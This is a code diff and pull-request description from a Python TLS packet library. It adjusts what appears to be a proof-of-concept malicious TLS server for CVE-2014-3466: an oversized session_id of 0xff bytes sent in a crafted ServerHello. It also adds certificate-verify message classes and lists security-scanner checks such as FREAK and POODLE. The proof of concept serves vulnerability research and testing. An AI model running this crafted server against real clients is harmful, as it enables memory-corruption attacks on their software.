         session_id= '\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff'
-        cipher_suite= RSA_WITH_3DES_EDE_CBC_SHA
+        cipher_suite= RSA_WITH_AES_128_CBC_SHA
         compression_method= NULL
         \extensions\
 '''
@@ -139,11 +158,9 @@ try:
     # This import works from the project directory
     basedir = os.path.abspath(os.path.join(os.path.dirname(__file__),"../"))
     sys.path.append(basedir)
-    from scapy_ssl_tls.ssl_tls_automata import TLSServerAutomata
     from scapy_ssl_tls.ssl_tls import *
 except ImportError:
     # If you installed this package via pip, you just need to execute this
-    from scapy.layers.ssl_tls_automata import TLSServerAutomata
     from scapy.layers.ssl_tls import *
 
 
@@ -174,8 +191,8 @@ def main():
         
         cipher =  p_client_hello[TLSClientHello].cipher_suites[0] if TLSCipherSuite.RSA_WITH_AES_128_CBC_SHA not in p_client_hello[TLSClientHello].cipher_suites else TLSCipherSuite.RSA_WITH_AES_128_CBC_SHA
         
-        p_server_hello = TLSRecord(version=p_client_hello[TLSHandshake].version)/TLSHandshake()/ \
-                            TLSServerHello(version=p_client_hello[TLSHandshake].version, 
+        p_server_hello = TLSRecord(version=p_client_hello[TLSClientHello].version)/TLSHandshake()/ \
+                            TLSServerHello(version=p_client_hello[TLSClientHello].version, 
                                             compression_method = TLSCompressionMethod.NULL,
                                             cipher_suite = cipher,
                                             session_id_length = 100,

--- a/scapy_ssl_tls/ssl_tls.py
+++ b/scapy_ssl_tls/ssl_tls.py
@@ -592,7 +592,20 @@ class TLSCertificateList(PacketNoPayload):
     fields_desc = [
                    XBLenField("length", None, length_of="certificates", fmt="!I", numbytes=3),
                    PacketListField("certificates", None, TLSCertificate, length_from=lambda x:x.length),
-                  ]   
+                  ]
+
+class TLSDigitallySigned(PacketNoPayload):
+    name = "TLS Digitally Signed"
+    fields_desc = [
+                   PacketField("algorithm", None, TLSSignatureHashAlgorithm),
+                   StrField("signature", "", fmt="H"),  # ASN.1 signature element
+                  ] 
+
+class TLSCertificateVerify(PacketNoPayload):
+    name = "TLS Certificate Verify"
+    fields_desc = [
+                   PacketField("digitally-signed", None, TLSDigitallySigned),
+                  ]  
 
 class TLSDecryptablePacket(PacketLengthFieldPayload):
 


### PR DESCRIPTION
* adds poc for cve-2014-3466
* adds certificate_verify message
* security_scanner
 * adds check for renegotiation_info
 * adds basic client side sloth check (rsa+md5|sha1 in ext: signature and hash algorithms) (primarly for sniffer based security checker - which is not implemented atm)
 * adds pubkey min length check, uncommon pubkey length check, factorized moduli check, see below
 * adds security_scanner passive (sniff) mode

            * EVENT - CIPHERS - Export ciphers enabled
            * EVENT - CIPHERS - RC4 ciphers enabled
            * EVENT - CIPHERS - MD5 ciphers enabled
            * EVENT - FREAK - server supports RSA_EXPORT cipher suites
            * EVENT - INSUFFICIENT SERVER CERT PUBKEY SIZE - 2048 >= 640 bits
            * EVENT - SUSPICIOUS SERVER CERT PUBKEY SIZE - 640 not a multiple of 2048 bits
            * EVENT - SERVER CERT PUBKEY FACTORED - trivial private_key recovery possible due to known factors n = p x q. See https://en.wikipedia.org/wiki/RSA_numbers | grep 3107418240490043721350750035888567930037346022842727545720161948823206440518081504556346829671723286782437916272838033415471073108501919548529007337724822783525742386454014691736602477652346609
            * EVENT - DOWNGRADE / POODLE - FALLBACK_SCSV - not honored